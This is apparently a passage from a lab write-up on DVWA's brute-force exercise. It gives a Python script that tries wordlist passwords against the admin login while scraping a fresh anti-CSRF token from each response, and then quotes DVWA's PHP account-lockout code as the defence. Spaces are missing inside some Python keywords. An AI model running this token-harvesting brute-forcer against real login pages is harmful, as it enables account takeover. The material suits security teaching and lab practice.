defaccess_once(password):# 请求一次 p["password"] = password r = requests.get(url=u, headers=h, params=p) if flag in r.text: # 判断是否登录成功 print("[+] Password Found: %s" % password) exit() elif"Vulnerability: Brute Force"notin r.text: # 判断是否因为token错误返回登录页面 print("Not in the target page, plz reset the initial token") exit() else: print("Testing: %s" % password) offset = r.text.find("user_token") next_token = r.text[offset+19:offset+51] # 获取下一个token p["user_token"] = next_token
defbrute_force(dic_path): pws = open("test.txt").read().split('\n') for pw in pws: if pw != '': access_once(pw)
if __name__ == '__main__': u = "http://192.168.249.129/dvwa/vulnerabilities/brute/"# url路径 p = {"username":"admin", "password":"123", "Login":"Login"} # GET传参 h = {"Cookie":"PHPSESSID=crc8f16n12orl898p045cdtvg7; security=high"} #cookie信息 flag = "Welcome to the password protected area admin"# 判断是否登录成功的字符串 p["user_token"] = "310efbd56d1e4f90f8f4fdfacae910b8"# 初始token, 需要手动获取 dictionary = "test.txt"# 字典路径 brute_force(dictionary)
// Check the database (Check user information) $data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' ); $data->bindParam( ':user', $user, PDO::PARAM_STR ); $data->execute(); $row = $data->fetch();
// Check to see if the user has been locked out. if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) ) { // Calculate when the user would be allowed to login again $last_login = $row[ 'last_login' ]; $last_login = strtotime( $last_login ); $timeout = strtotime( "{$last_login} +{$lockout_time} minutes" ); $timenow = strtotime( "now" );
// Check to see if enough time has passed, if it hasn't locked the account if( $timenow > $timeout ) $account_locked = true; }
// Check the database (if username matches the password) $data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); $data->bindParam( ':user', $user, PDO::PARAM_STR); $data->bindParam( ':password', $pass, PDO::PARAM_STR ); $data->execute(); $row = $data->fetch();
// Had the account been locked out since last login? if( $failed_login >= $total_failed_login ) { $html .= "<p><em>Warning</em>: Someone might of been brute forcing your account.</p>"; $html .= "<p>Number of login attempts: <em>{$failed_login}</em>.<br />Last login attempt was at: <em>${last_login}</em>.</p>"; }
// Update bad login count $data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' ); $data->bindParam( ':user', $user, PDO::PARAM_STR ); $data->execute();